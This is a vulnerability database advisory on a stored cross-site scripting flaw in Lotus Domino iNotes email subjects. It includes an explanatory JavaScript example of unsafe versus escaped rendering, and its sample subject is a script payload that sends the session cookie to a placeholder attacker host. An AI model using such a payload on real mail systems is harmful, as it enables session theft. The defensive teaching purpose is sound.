Lotus Domino iNotes Email Subject XSS

2006-02-10T07:02:51
ID OSVDB:23078
Type osvdb
Reporter Jakob Balle(jb@secunia.com)
Modified 2006-02-10T07:02:51

Description

Vulnerability Description

Lotus Domino iNotes contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the application does not validate or encode the subject of an e-mail before displaying it to the user. A remote attacker can send a message with a specially crafted subject that, when rendered in the recipient's browser, executes arbitrary script code within the trust relationship between the browser and the server, leading to a loss of integrity. Because the subject is stored with the message and rendered whenever the message is displayed, the victim need do nothing beyond viewing their mail in the browser.
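The following is an added example, not code from Lotus Domino or from the advisory, that illustrates the flaw class described above: a web mail front end that concatenates an unescaped subject into its HTML, beside the hardened form that encodes every untrusted field on output. The helper names, the inbox-row markup and the sample message are assumptions made for the illustration.

```javascript
// Added example: constructed illustration of HTML injection via an unescaped
// mail subject and its fix. This is NOT Lotus Domino/iNotes code; the helper
// names, the inbox-row markup and the sample message are assumptions.

// Minimal HTML escaping of the five characters that matter in text and
// attribute context. The fix is to treat the subject as data, never as markup.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable rendering: the subject is concatenated straight into the page,
// so a subject carrying markup is parsed as markup by the recipient's browser.
function renderRowUnsafe(msg) {
  return `<tr><td>${msg.from}</td><td>${msg.subject}</td></tr>`;
}

// Hardened rendering: every untrusted field is escaped on output. In a live
// DOM the equivalent is assigning to textContent rather than innerHTML.
function renderRowSafe(msg) {
  return `<tr><td>${escapeHtml(msg.from)}</td><td>${escapeHtml(msg.subject)}</td></tr>`;
}

// Crude check used only to make the difference visible: after removing the
// tags the template itself emits, does any other tag remain in the output?
function containsInjectedTag(html) {
  const stripped = html.replace(/<\/?(tr|td)>/g, "");
  return /<[a-z!\/]/i.test(stripped);
}

// Constructed sample message; the subject is an attacker-chosen payload that
// would exfiltrate the session cookie if it ran in the victim's browser.
const sampleMessage = {
  from: "attacker@example.invalid",
  subject: '<script>document.location="http://attacker.example.invalid/?c="+document.cookie</script>',
};

console.log(containsInjectedTag(renderRowUnsafe(sampleMessage)));  // true
console.log(containsInjectedTag(renderRowSafe(sampleMessage)));    // false
```

The point of the check function is only to show that escaping removes the attacker's ability to open a tag; a real deployment would rely on a templating layer that escapes by default rather than on a post-hoc scan of the generated markup.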

Solution Description

Upgrade to version 6.5.5 or 7.0.1 or higher, which are reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Lotus Domino iNotes does not validate the subject of an e-mail before displaying it, allowing a remote attacker to execute arbitrary script code in a user's browser via a specially crafted subject.

References:

Vendor Specific Advisory URL
Security Tracker: 1015610
Secunia Advisory ID: 16340
Related OSVDB ID: 23077
Related OSVDB ID: 23079
Other Advisory URL: http://secunia.com/secunia_research/2005-38/advisory/
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0183.html
ISS X-Force ID: 24612
FrSIRT Advisory: ADV-2006-0499
CVE-2006-0663
Bugtraq ID: 16577